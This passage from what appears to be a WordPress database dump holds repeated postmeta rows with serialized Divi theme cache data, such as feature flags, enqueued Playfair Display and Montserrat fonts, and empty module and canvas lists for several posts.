:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33222,674,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33209,576,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33205,700,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33206,700,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33207,576,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33208,576,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33201,957,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33202,957,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33203,700,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33204,700,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33197,980,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33198,980,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33199,957,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33200,957,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33194,1090,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33195,980,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33196,980,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33190,1518,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33191,1090,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33192,1090,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33193,1090,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33186,1564,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33187,1518,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33188,1518,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33189,1518,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33182,649,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33183,1564,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33184,1564,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33185,1564,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33178,589,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33179,649,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33180,649,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33181,649,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33169,1576,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33170,1576,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33171,698,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33172,698,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33173,698,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33174,698,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33175,589,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33176,589,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33177,589,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33161,528,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33162,528,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33163,742,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33164,742,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33165,742,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33166,742,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33167,1576,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33168,1576,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33157,534,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s